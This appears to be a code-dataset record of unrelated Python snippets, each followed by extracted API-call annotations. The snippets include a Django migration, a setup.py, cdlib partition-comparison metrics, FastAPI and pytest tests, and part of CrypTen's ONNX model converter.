] | [((824, 860), 'lib.utils.load_json', 'utils.load_json', (['config.CLASSES_PATH'], {}), '(config.CLASSES_PATH)\n', (839, 860), True, 'import lib.utils as utils\n'), ((906, 949), 'lib.utils.load_json', 'utils.load_json', (['config.TRAIN_METADATA_PATH'], {}), '(config.TRAIN_METADATA_PATH)\n', (921, 949), True, 'import lib.utils as utils\n'), ((967, 1008), 'lib.utils.load_json', 'utils.load_json', (['config.VAL_METADATA_PATH'], {}), '(config.VAL_METADATA_PATH)\n', (982, 1008), True, 'import lib.utils as utils\n'), ((1027, 1069), 'lib.utils.load_json', 'utils.load_json', (['config.TEST_METADATA_PATH'], {}), '(config.TEST_METADATA_PATH)\n', (1042, 1069), True, 'import lib.utils as utils\n'), ((3668, 3736), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Print statistics about downloaded videos."""'], {}), "('Print statistics about downloaded videos.')\n", (3691, 3736), False, 'import argparse, os\n'), ((1265, 1293), 'lib.utils.load_json', 'utils.load_json', (['args.subset'], {}), '(args.subset)\n', (1280, 1293), True, 'import lib.utils as utils\n'), ((1646, 1675), 'os.path.isdir', 'os.path.isdir', (['cls_train_path'], {}), '(cls_train_path)\n', (1659, 1675), False, 'import argparse, os\n'), ((1896, 1925), 'os.path.isdir', 'os.path.isdir', (['cls_valid_path'], {}), '(cls_valid_path)\n', (1909, 1925), False, 'import argparse, os\n')] |
import tensorflow as tf
def tanh(x):
    """Element-wise hyperbolic tangent activation (thin wrapper over ``tf.nn.tanh``)."""
    return tf.nn.tanh(x)
| [
"tensorflow.nn.tanh"
] | [((50, 63), 'tensorflow.nn.tanh', 'tf.nn.tanh', (['x'], {}), '(x)\n', (60, 63), True, 'import tensorflow as tf\n')] |
# Generated by Django 3.0 on 2019-12-23 06:19
from django.db import migrations, models
class Migration(migrations.Migration):
    # Schema migration: add an integer `playersready` counter (default 0)
    # to the `onlinegame` model.
    dependencies = [
        ('game', '0010_auto_20191223_0818'),
    ]
    operations = [
        migrations.AddField(
            model_name='onlinegame',
            name='playersready',
            field=models.IntegerField(default=0),
        ),
    ]
| [
"django.db.models.IntegerField"
] | [((354, 384), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (373, 384), False, 'from django.db import migrations, models\n')] |
import shutil
import pathlib
# CI artifact directories that may contain MATLAB bundles to publish.
asset_dirs = ["artifacts/main", "artifacts/build_python_version"]
# Ensure the destination exists (no error if it already does).
pathlib.Path("distfiles").mkdir(exist_ok=True)
for asset_dir in asset_dirs:
    # Recursively collect every RobotRaconteur MATLAB artifact in this tree.
    for fname in list(pathlib.Path(asset_dir).glob('**/RobotRaconteur-*-MATLAB*')):
        print(fname)
        dest = pathlib.Path(fname)
shutil.copy(str(fname),"distfiles/" + dest.name) | [
"pathlib.Path"
] | [((97, 122), 'pathlib.Path', 'pathlib.Path', (['"""distfiles"""'], {}), "('distfiles')\n", (109, 122), False, 'import pathlib\n'), ((294, 313), 'pathlib.Path', 'pathlib.Path', (['fname'], {}), '(fname)\n', (306, 313), False, 'import pathlib\n'), ((196, 219), 'pathlib.Path', 'pathlib.Path', (['asset_dir'], {}), '(asset_dir)\n', (208, 219), False, 'import pathlib\n')] |
"""Metadata for package to allow installation with pip."""
import setuptools
# Load __version__ without importing the package (avoids import-time deps).
# Fix: the original `exec(open(...).read())` leaked the file handle; both
# reads now use a context manager and an explicit encoding.
with open("closek/version.py", encoding="utf-8") as version_file:
    exec(version_file.read())

# Use the README as the long description shown on PyPI.
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="closek",
    description="Scikit-learn-style implementation of the close-k classifier.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    author="<NAME>",
    author_email="<EMAIL>",
    url="https://github.com/bryan-he/close-k",
    version=__version__,
    packages=setuptools.find_packages(),
    install_requires=[
        "torch",
        "numpy",
        # NOTE(review): PyPI deprecated the 'sklearn' distribution name in
        # favour of 'scikit-learn' — confirm before changing.
        "sklearn",
    ],
    tests_require=[
        "pmlb",
    ],
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
    ]
)
| [
"setuptools.find_packages"
] | [((529, 555), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (553, 555), False, 'import setuptools\n')] |
import numpy as np
from cdlib.evaluation.internal import onmi
from cdlib.evaluation.internal.omega import Omega
from nf1 import NF1
from collections import namedtuple, defaultdict
# Public API of this module.
__all__ = [
    "MatchingResult",
    "normalized_mutual_information",
    "overlapping_normalized_mutual_information_LFK",
    "overlapping_normalized_mutual_information_MGH",
    "omega",
    "f1",
    "nf1",
    "adjusted_rand_index",
    "adjusted_mutual_information",
    "variation_of_information",
    "partition_closeness_simple",
]
# MatchingResult = namedtuple("MatchingResult", ['mean', 'std'])
# Result container: `score` is the comparison value; `std` is its standard
# deviation (populated only by measures that compute one, e.g. f1).
MatchingResult = namedtuple("MatchingResult", "score std")
# Make both fields optional, defaulting to None.
MatchingResult.__new__.__defaults__ = (None,) * len(MatchingResult._fields)
def __check_partition_coverage(first_partition: object, second_partition: object):
    """Raise ValueError unless both partitions cover exactly the same node set."""
    first_nodes = {
        node for community in first_partition.communities for node in community
    }
    second_nodes = {
        node for community in second_partition.communities for node in community
    }
    if first_nodes != second_nodes:
        raise ValueError("Both partitions should cover the same node set")
def __check_partition_overlap(first_partition: object, second_partition: object):
    """Raise ValueError if either clustering is overlapping."""
    if any((first_partition.overlap, second_partition.overlap)):
        raise ValueError("Not defined for overlapping partitions")
def normalized_mutual_information(
    first_partition: object, second_partition: object
) -> MatchingResult:
    """
    Normalized Mutual Information between two clusterings.
    Normalized Mutual Information (NMI) is a normalization of the Mutual
    Information (MI) score to scale the results between 0 (no mutual
    information) and 1 (perfect correlation). In this function, mutual
    information is normalized by ``sqrt(H(labels_true) * H(labels_pred))``
    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object
    :Example:
    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.normalized_mutual_information(louvain_communities,leiden_communities)
    """
    __check_partition_coverage(first_partition, second_partition)
    __check_partition_overlap(first_partition, second_partition)

    def _community_labels(partition):
        # One (node, community-id) pair per membership; sorting by node yields
        # label vectors aligned across both partitions (identical node sets are
        # guaranteed by the coverage check above).
        pairs = [
            (node, nid)
            for nid, cluster in enumerate(partition.communities)
            for node in cluster
        ]
        return [nid for _, nid in sorted(pairs, key=lambda pair: pair[0])]

    from sklearn.metrics import normalized_mutual_info_score

    return MatchingResult(
        score=normalized_mutual_info_score(
            _community_labels(first_partition), _community_labels(second_partition)
        )
    )
def overlapping_normalized_mutual_information_LFK(
    first_partition: object, second_partition: object
) -> MatchingResult:
    """
    Overlapping Normalized Mutual Information between two clusterings, in the
    formulation proposed by Lancichinetti et al. (1): an extension of NMI that
    copes with overlapping partitions.
    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object
    :Example:
    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.overlapping_normalized_mutual_information_LFK(louvain_communities,leiden_communities)
    :Reference:
    1. Lancichinetti et al. (2009). Detecting the overlapping and hierarchical community structure in complex networks. New Journal of Physics, 11(3), 033015.
    """
    first_cover = [set(community) for community in first_partition.communities]
    second_cover = [set(community) for community in second_partition.communities]
    return MatchingResult(score=onmi.onmi(first_cover, second_cover))
def overlapping_normalized_mutual_information_MGH(
    first_partition: object, second_partition: object, normalization: str = "max"
) -> MatchingResult:
    """
    Overlapping Normalized Mutual Information between two clusterings.
    McDaid et al.'s variant of the overlapping NMI, which uses a different
    normalization than the original LFK formulation. See the reference for
    details.
    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :param normalization: one of "max" or "LFK". Default "max" (corresponds to the main method described in the article)
    :return: MatchingResult object
    :Example:
    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.overlapping_normalized_mutual_information_MGH(louvain_communities,leiden_communities)
    :Reference:
    1. McDaid et al. (2011). Normalized mutual information to evaluate overlapping community finding algorithms. arXiv preprint arXiv:1110.2515.
    """
    # Dispatch table instead of an if/elif chain.
    variant_by_normalization = {"max": "MGH", "LFK": "MGH_LFK"}
    if normalization not in variant_by_normalization:
        raise ValueError(
            "Wrong 'normalization' value. Please specify one among [max, LFK]."
        )

    first_cover = [set(community) for community in first_partition.communities]
    second_cover = [set(community) for community in second_partition.communities]
    return MatchingResult(
        score=onmi.onmi(
            first_cover,
            second_cover,
            variant=variant_by_normalization[normalization],
        )
    )
def omega(first_partition: object, second_partition: object) -> MatchingResult:
    """
    Index of resemblance for overlapping, complete coverage, network clusterings.
    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object
    :Example:
    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.omega(louvain_communities,leiden_communities)
    :Reference:
    1. Using the omega index for evaluating abstractive algorithms detection. Proceedings of Workshop on Evaluation Metrics and System Comparison for Automatic Summarization, ACL 2012, 10-18.
    """
    __check_partition_coverage(first_partition, second_partition)

    # The Omega implementation expects {community-id: node-list} mappings.
    first_partition = dict(enumerate(first_partition.communities))
    second_partition = dict(enumerate(second_partition.communities))
    omega_index = Omega(first_partition, second_partition)
    return MatchingResult(score=omega_index.omega_score)
def f1(first_partition: object, second_partition: object) -> MatchingResult:
    """
    Average F1 score of the optimal algorithms matches among the partitions in
    input. Works on overlapping/non-overlapping complete/partial coverage
    partitions.
    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object (mean F1 in ``score``, its std in ``std``)
    :Example:
    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.f1(louvain_communities,leiden_communities)
    :Reference:
    1. A novel approach to evaluate algorithms detection internal on ground truth. In Complex Networks VII (pp. 133-144). Springer, Cham (2016).
    """
    matcher = NF1(first_partition.communities, second_partition.communities)
    details = matcher.summary()["details"]
    return MatchingResult(score=details["F1 mean"][0], std=details["F1 std"][0])
def nf1(first_partition: object, second_partition: object) -> MatchingResult:
    """
    Normalized F1 score of the optimal algorithms matches among the partitions
    in input. Works on overlapping/non-overlapping complete/partial coverage
    partitions.
    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object
    :Example:
    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.nf1(louvain_communities,leiden_communities)
    :Reference:
    1. A novel approach to evaluate algorithms detection internal on ground truth (2016).
    2. RDyn: graph benchmark handling algorithms dynamics. Journal of Complex Networks, 5(6), 893-912 (2017).
    """
    matcher = NF1(first_partition.communities, second_partition.communities)
    summary = matcher.summary()
    return MatchingResult(score=summary["scores"].loc["NF1"][0])
def adjusted_rand_index(
    first_partition: object, second_partition: object
) -> MatchingResult:
    """Rand index adjusted for chance.
    The Rand Index computes a similarity measure between two clusterings
    by considering all pairs of samples and counting pairs that are
    assigned in the same or different clusters in the predicted and
    true clusterings.
    The raw RI score is then "adjusted for chance" into the ARI score
    using the following scheme::
        ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
    The adjusted Rand index is thus ensured to have a value close to
    0.0 for random labeling independently of the number of clusters and
    samples and exactly 1.0 when the clusterings are identical (up to
    a permutation).
    ARI is a symmetric measure::
        adjusted_rand_index(a, b) == adjusted_rand_index(b, a)
    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object
    :Example:
    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.adjusted_rand_index(louvain_communities,leiden_communities)
    :Reference:
    1. Comparing partitions. Journal of classification, 2(1), 193-218 (1985).
    """
    __check_partition_coverage(first_partition, second_partition)
    __check_partition_overlap(first_partition, second_partition)

    def _community_labels(partition):
        # One (node, community-id) pair per membership; sorting by node yields
        # label vectors aligned across both partitions (identical node sets are
        # guaranteed by the coverage check above).
        pairs = [
            (node, nid)
            for nid, cluster in enumerate(partition.communities)
            for node in cluster
        ]
        return [nid for _, nid in sorted(pairs, key=lambda pair: pair[0])]

    from sklearn.metrics import adjusted_rand_score

    return MatchingResult(
        score=adjusted_rand_score(
            _community_labels(first_partition), _community_labels(second_partition)
        )
    )
def adjusted_mutual_information(
    first_partition: object, second_partition: object
) -> MatchingResult:
    """Adjusted Mutual Information between two clusterings.
    Adjusted Mutual Information (AMI) is an adjustment of the Mutual
    Information (MI) score to account for chance. It accounts for the fact that
    the MI is generally higher for two clusterings with a larger number of
    clusters, regardless of whether there is actually more information shared.
    For two clusterings :math:`U` and :math:`V`, the AMI is given as::
        AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]
    This metric is independent of the absolute values of the labels:
    a permutation of the class or cluster label values won't change the
    score value in any way.
    This metric is furthermore symmetric: switching ``label_true`` with
    ``label_pred`` will return the same score value. This can be useful to
    measure the agreement of two independent label assignments strategies
    on the same dataset when the real ground truth is not known.
    Be mindful that this function is an order of magnitude slower than other
    metrics, such as the Adjusted Rand Index.
    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object
    :Example:
    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.adjusted_mutual_information(louvain_communities,leiden_communities)
    :Reference:
    1. Information theoretic measures for clusterings comparison: Variants, properties, normalization and correction for chance. Journal of Machine Learning Research, 11(Oct), 2837-2854 (2010).
    """
    __check_partition_coverage(first_partition, second_partition)
    __check_partition_overlap(first_partition, second_partition)

    def _community_labels(partition):
        # One (node, community-id) pair per membership; sorting by node yields
        # label vectors aligned across both partitions (identical node sets are
        # guaranteed by the coverage check above).
        pairs = [
            (node, nid)
            for nid, cluster in enumerate(partition.communities)
            for node in cluster
        ]
        return [nid for _, nid in sorted(pairs, key=lambda pair: pair[0])]

    from sklearn.metrics import adjusted_mutual_info_score

    return MatchingResult(
        score=adjusted_mutual_info_score(
            _community_labels(first_partition), _community_labels(second_partition)
        )
    )
def variation_of_information(
    first_partition: object, second_partition: object
) -> MatchingResult:
    """Variation of Information among two nodes partitions.

    $$ H(p)+H(q)-2MI(p, q) $$

    where MI is the mutual information, H the partition entropy and p,q are the algorithms sets

    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object

    :Example:

    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.variation_of_information(louvain_communities,leiden_communities)

    :Reference:

    1. Meila, M. (2007). `Comparing clusterings - an information based distance. <https://www.sciencedirect.com/science/article/pii/S0047259X06002016/>`_ Journal of Multivariate Analysis, 98, 873-895. doi:10.1016/j.jmva.2006.11.013
    """
    __check_partition_coverage(first_partition, second_partition)
    __check_partition_overlap(first_partition, second_partition)

    # Total number of nodes (both partitions cover the same node set).
    total = float(sum(len(com) for com in first_partition.communities))

    vi = 0.0
    for com_a in first_partition.communities:
        p = len(com_a) / total
        members_a = set(com_a)
        for com_b in second_partition.communities:
            q = len(com_b) / total
            # Fraction of all nodes shared by the two communities.
            r = len(members_a & set(com_b)) / total
            if r > 0.0:
                vi += r * (np.log2(r / p) + np.log2(r / q))

    return MatchingResult(score=abs(vi))
def partition_closeness_simple(
    first_partition: object, second_partition: object
) -> MatchingResult:
    """Community size density closeness.
    Simple implementation that does not leverage kernel density estimator.

    $$ S_G(A,B) = \frac{1}{2} \Sum_{i=1}^{r}\Sum_{j=1}^{s} min(\frac{n^a(x^a_i)}{N^a}, \frac{n^b_j(x^b_j)}{N^b}) \delta(x_i^a,x_j^b) $$

    where:

    $$ N^a $$ total number of communities in A of any size;
    $$ x^a $$ ordered list of community sizes for A;
    $$ n^a $$ multiplicity of community sizes for A.

    (symmetrically for B)

    :param first_partition: NodeClustering object
    :param second_partition: NodeClustering object
    :return: MatchingResult object

    :Example:

    >>> from cdlib import evaluation, algorithms
    >>> g = nx.karate_club_graph()
    >>> louvain_communities = algorithms.louvain(g)
    >>> leiden_communities = algorithms.leiden(g)
    >>> evaluation.partition_closeness_simple(louvain_communities,leiden_communities)

    :Reference:

    1. Dao, Vinh-Loc, <NAME>, and <NAME>. "Estimating the similarity of community detection methods based on cluster size distribution." International Conference on Complex Networks and their Applications. Springer, Cham, 2018.
    """

    def _size_distribution(partition):
        # Histogram of community sizes: n(x) = number of communities of size x.
        histogram = defaultdict(int)
        for community in partition.communities:
            histogram[len(community)] += 1
        sizes = sorted(histogram)
        freqs = [histogram[s] for s in sizes]
        # Normalization constant: sum over sizes of size * multiplicity.
        norm = sum(s * f for s, f in zip(sizes, freqs))
        return sizes, freqs, norm

    # Bug fix: the previous implementation counted multiplicities over the
    # *deduplicated* list of sizes, so every frequency came out as 1 and the
    # "multiplicity of community sizes" term of the reference formula was lost.
    # Behavior is unchanged whenever all community sizes are distinct.
    coms_a, freq_a, n_a = _size_distribution(first_partition)
    coms_b, freq_b, n_b = _size_distribution(second_partition)

    closeness = 0
    for i in range(len(coms_a)):
        for j in range(len(coms_b)):
            if coms_a[i] == coms_b[j]:
                closeness += min(
                    (coms_a[i] * freq_a[i]) / n_a, (coms_b[j] * freq_b[j]) / n_b
                )

    closeness *= 0.5

    return MatchingResult(score=closeness)
| [
"cdlib.evaluation.internal.omega.Omega",
"collections.namedtuple",
"sklearn.metrics.adjusted_mutual_info_score",
"numpy.log2",
"sklearn.metrics.adjusted_rand_score",
"collections.defaultdict",
"sklearn.metrics.normalized_mutual_info_score",
"nf1.NF1"
] | [((606, 647), 'collections.namedtuple', 'namedtuple', (['"""MatchingResult"""', '"""score std"""'], {}), "('MatchingResult', 'score std')\n", (616, 647), False, 'from collections import namedtuple, defaultdict\n'), ((7282, 7322), 'cdlib.evaluation.internal.omega.Omega', 'Omega', (['first_partition', 'second_partition'], {}), '(first_partition, second_partition)\n', (7287, 7322), False, 'from cdlib.evaluation.internal.omega import Omega\n'), ((8383, 8445), 'nf1.NF1', 'NF1', (['first_partition.communities', 'second_partition.communities'], {}), '(first_partition.communities, second_partition.communities)\n', (8386, 8445), False, 'from nf1 import NF1\n'), ((9760, 9822), 'nf1.NF1', 'NF1', (['first_partition.communities', 'second_partition.communities'], {}), '(first_partition.communities, second_partition.communities)\n', (9763, 9822), False, 'from nf1 import NF1\n'), ((17907, 17923), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (17918, 17923), False, 'from collections import namedtuple, defaultdict\n'), ((18180, 18196), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (18191, 18196), False, 'from collections import namedtuple, defaultdict\n'), ((3107, 3174), 'sklearn.metrics.normalized_mutual_info_score', 'normalized_mutual_info_score', (['first_partition_c', 'second_partition_c'], {}), '(first_partition_c, second_partition_c)\n', (3135, 3174), False, 'from sklearn.metrics import normalized_mutual_info_score\n'), ((12174, 12232), 'sklearn.metrics.adjusted_rand_score', 'adjusted_rand_score', (['first_partition_c', 'second_partition_c'], {}), '(first_partition_c, second_partition_c)\n', (12193, 12232), False, 'from sklearn.metrics import adjusted_rand_score\n'), ((14986, 15051), 'sklearn.metrics.adjusted_mutual_info_score', 'adjusted_mutual_info_score', (['first_partition_c', 'second_partition_c'], {}), '(first_partition_c, second_partition_c)\n', (15012, 15051), False, 'from sklearn.metrics import 
adjusted_mutual_info_score\n'), ((16491, 16505), 'numpy.log2', 'np.log2', (['(r / p)'], {}), '(r / p)\n', (16498, 16505), True, 'import numpy as np\n'), ((16508, 16522), 'numpy.log2', 'np.log2', (['(r / q)'], {}), '(r / q)\n', (16515, 16522), True, 'import numpy as np\n')] |
from typing import Optional
import pytest
from fastapi import FastAPI, Header
from fastapi.testclient import TestClient
from meiga import BoolResult, Failure, isFailure, isSuccess
from petisco import NotFound, assert_http
from petisco.extra.fastapi import FastAPIController
app = FastAPI(title="test-app")
# Maps the requested behavior key to the Result the controller should produce.
result_from_expected_behavior = dict(
    success=isSuccess,
    failure_generic=isFailure,
    failure_not_found=Failure(NotFound()),
)
class MyController(FastAPIController):
    """Controller that returns the canned result selected by `expected_behavior`."""

    def execute(self, expected_behavior: str) -> BoolResult:
        # Unknown behavior keys fall back to a successful result.
        outcome = result_from_expected_behavior.get(expected_behavior, isSuccess)
        return outcome
@app.get("/test")
def entry_point(x_behavior: Optional[str] = Header("success")):
    """Route the `x-behavior` header through MyController and return its result."""
    controller = MyController()
    return controller.execute(x_behavior)
@pytest.mark.unit
@pytest.mark.parametrize(
    "behavior,expected_status_code",
    [("success", 200), ("failure_generic", 500), ("failure_not_found", 404)],
)
def test_fastapi_app_with_controller_should_return_expected_values(
    behavior, expected_status_code
):
    """Each behavior header must map to its expected HTTP status code."""
    with TestClient(app) as client:
        http_response = client.get("/test", headers={"x-behavior": behavior})
        assert_http(http_response, expected_status_code)
| [
"fastapi.Header",
"fastapi.FastAPI",
"fastapi.testclient.TestClient",
"pytest.mark.parametrize",
"petisco.assert_http",
"petisco.NotFound"
] | [((283, 308), 'fastapi.FastAPI', 'FastAPI', ([], {'title': '"""test-app"""'}), "(title='test-app')\n", (290, 308), False, 'from fastapi import FastAPI, Header\n'), ((784, 918), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""behavior,expected_status_code"""', "[('success', 200), ('failure_generic', 500), ('failure_not_found', 404)]"], {}), "('behavior,expected_status_code', [('success', 200),\n ('failure_generic', 500), ('failure_not_found', 404)])\n", (807, 918), False, 'import pytest\n'), ((697, 714), 'fastapi.Header', 'Header', (['"""success"""'], {}), "('success')\n", (703, 714), False, 'from fastapi import FastAPI, Header\n'), ((437, 447), 'petisco.NotFound', 'NotFound', ([], {}), '()\n', (445, 447), False, 'from petisco import NotFound, assert_http\n'), ((1041, 1056), 'fastapi.testclient.TestClient', 'TestClient', (['app'], {}), '(app)\n', (1051, 1056), False, 'from fastapi.testclient import TestClient\n'), ((1149, 1192), 'petisco.assert_http', 'assert_http', (['response', 'expected_status_code'], {}), '(response, expected_status_code)\n', (1160, 1192), False, 'from petisco import NotFound, assert_http\n')] |
from django.core.mail import send_mail
from component.reminder.models import Reminder
from server.celery import app
@app.task
def send_email(id):
    """Celery task: e-mail the text of the Reminder with the given id.

    Does nothing (silently) when no matching Reminder exists.
    """
    reminder = Reminder.objects.filter(id=id).first()
    if reminder is None:
        return
    send_mail(
        subject="ReminderMessage",
        message=reminder.text,
        from_email='<EMAIL>',
        recipient_list=[reminder.email],
    )
| [
"django.core.mail.send_mail",
"component.reminder.models.Reminder.objects.filter"
] | [((240, 359), 'django.core.mail.send_mail', 'send_mail', ([], {'subject': '"""ReminderMessage"""', 'message': 'reminder.text', 'from_email': '"""<EMAIL>"""', 'recipient_list': '[reminder.email]'}), "(subject='ReminderMessage', message=reminder.text, from_email=\n '<EMAIL>', recipient_list=[reminder.email])\n", (249, 359), False, 'from django.core.mail import send_mail\n'), ((164, 194), 'component.reminder.models.Reminder.objects.filter', 'Reminder.objects.filter', ([], {'id': 'id'}), '(id=id)\n', (187, 194), False, 'from component.reminder.models import Reminder\n')] |
import pandas as pd
import pytest
from ..base import BaseMiner, MDLOptimizer
def test_inst_params():
    """get_params/set_params round-trip values and reject unknown keys."""

    class MyMiner(BaseMiner):
        def __init__(self, eps=3):
            self.eps = eps
            self._a = 2

        def fit(self, D):
            self._a = 12

    params = {"eps": 4}
    miner = MyMiner(**params)
    assert miner.get_params() == params

    params["eps"] = 10
    miner.set_params(**params)
    assert miner.get_params() == params
    # calling set_params() with no arguments must leave parameters untouched
    assert miner.set_params().get_params() == params

    with pytest.raises(ValueError):
        miner.set_params(random_key=2)
def test_inst_params_no_init():
    """A miner without an explicit __init__ exposes an empty parameter dict."""

    class MyMiner(BaseMiner):
        def fit(self, D, y=None):
            return self

    assert MyMiner().get_params() == {}
def test_mdl_repr():
    """_repr_html_ renders a string on both fresh and fitted MDL optimizers."""

    class A(MDLOptimizer):
        def __init__(self):
            self.codetable_ = {1: [0, 1], 2: [1]}

        def fit(self):
            return self

        def evaluate(self):
            return True

        def generate_candidates(self):
            return []

    optimizer = A()
    assert isinstance(optimizer._repr_html_(), str)
    assert isinstance(optimizer.fit()._repr_html_(), str)
| [
"pytest.raises"
] | [((548, 573), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (561, 573), False, 'import pytest\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import io
import onnx
import torch
import torch.onnx.symbolic_helper as sym_help
import torch.onnx.symbolic_registry as sym_registry
import torch.onnx.utils
from onnx import numpy_helper
from torch.onnx import OperatorExportTypes
from . import module
# Optional TensorFlow support: `from_tensorflow` needs both `tensorflow` and
# `tf2onnx`; this flag records whether the pair is importable.
try:
    import tensorflow as tf  # noqa
    import tf2onnx

    TF_AND_TF2ONNX = True
except ImportError:
    TF_AND_TF2ONNX = False
def from_onnx(onnx_string_or_file):
    """
    Converts an ONNX model serialized in an `onnx_string_or_file` to a CrypTen model.
    """
    model_proto = _load_onnx_model(onnx_string_or_file)
    return _to_crypten(model_proto)
def from_pytorch(pytorch_model, dummy_input):
    """
    Converts a PyTorch model `pytorch_model` into a CrypTen model by tracing it
    using the input `dummy_input`.
    """
    # Serialize the traced model to ONNX, then build the CrypTen graph from it.
    onnx_stream = _from_pytorch_to_bytes(pytorch_model, dummy_input)
    crypten_model = from_onnx(onnx_stream)
    onnx_stream.close()

    # Keep the original architecture around so the model can be exported back
    # to a PyTorch model later.
    crypten_model.pytorch_model = copy.deepcopy(pytorch_model)

    # Mirror the train/eval flag of the source model.
    crypten_model.train(mode=pytorch_model.training)
    return crypten_model
def from_tensorflow(tensorflow_graph_def, inputs, outputs):
    """
    Function that converts Tensorflow model into CrypTen model based on
    https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py
    The model is returned in evaluation mode.
    Args:
        `tensorflow_graph_def`: Input Tensorflow GraphDef to be converted
        `inputs`: input nodes
        `outputs`: output nodes
    """
    # The function is deprecated: it unconditionally raises before doing any work.
    raise DeprecationWarning(
        "crypten.nn.from_tensorflow is deprecated. ",
        "CrypTen will no longer support model conversion from TensorFlow.",
    )
    # NOTE(review): everything below is unreachable because of the raise above;
    # it is the legacy TF -> ONNX -> CrypTen conversion path kept for reference.
    # Exporting model to ONNX graph
    if not TF_AND_TF2ONNX:
        raise ImportError("Please install both tensorflow and tf2onnx packages")

    with tf.Graph().as_default() as tf_graph:
        tf.import_graph_def(tensorflow_graph_def, name="")
    with tf2onnx.tf_loader.tf_session(graph=tf_graph):
        g = tf2onnx.tfonnx.process_tf_graph(
            tf_graph,
            opset=10,
            continue_on_error=False,
            input_names=inputs,
            output_names=outputs,
        )

    onnx_graph = tf2onnx.optimizer.optimize_graph(g)
    model_proto = onnx_graph.make_model(
        "converted from {}".format(tensorflow_graph_def)
    )
    f = io.BytesIO()
    f.write(model_proto.SerializeToString())

    # construct CrypTen model
    # Note: We don't convert crypten model to training mode, as Tensorflow
    # models are used for both training and evaluation without the specific
    # conversion of one mode to another
    f.seek(0)
    crypten_model = from_onnx(f)
    return crypten_model
def _from_pytorch_to_bytes(pytorch_model, dummy_input):
    """
    Returns I/O stream containing ONNX graph for `pytorch_model` traced with
    input `dummy_input`.
    """
    # A throwaway export populates the PyTorch-to-ONNX symbolic registry.
    with io.BytesIO() as scratch:
        _export_pytorch_model(scratch, pytorch_model, dummy_input)

    # Patch the registry with CrypTen-specific symbolic functions.
    _update_onnx_symbolic_registry()

    # Re-export so the resulting graph reflects the patched registry.
    stream = _export_pytorch_model(io.BytesIO(), pytorch_model, dummy_input)
    stream.seek(0)
    return stream
def _export_pytorch_model(f, pytorch_model, dummy_input):
    """
    Returns a binary I/O stream containing ONNX-exported pytorch_model that was
    traced with input `dummy_input`.
    """
    export_kwargs = dict(
        do_constant_folding=False,
        export_params=True,
        enable_onnx_checker=True,
        input_names=["input"],
        operator_export_type=OperatorExportTypes.ONNX,
        output_names=["output"],
    )
    torch.onnx.export(pytorch_model, dummy_input, f, **export_kwargs)
    return f
# mapping from ONNX to crypten.nn for modules with different names:
# (ONNX ops whose type name already matches a crypten.nn attribute are resolved
# directly via getattr in `_get_operator_class`; only mismatches are listed here)
ONNX_TO_CRYPTEN = {
    "adaptive_avg_pool2d": module.AdaptiveAvgPool2d,
    "adaptive_max_pool2d": module.AdaptiveMaxPool2d,
    "AveragePool": module.AvgPool2d,
    "Clip": module.Hardtanh,
    "MaxPool": module.MaxPool2d,
    "Pad": module._ConstantPad,
    "Relu": module.ReLU,
    "ReduceMean": module.Mean,
    "ReduceSum": module.Sum,
}
def _to_crypten(onnx_model):
    """
    Function that converts an `onnx_model` to a CrypTen model.
    """
    # Build the (empty) computation graph.
    input_names, output_names = _get_input_output_names(onnx_model)
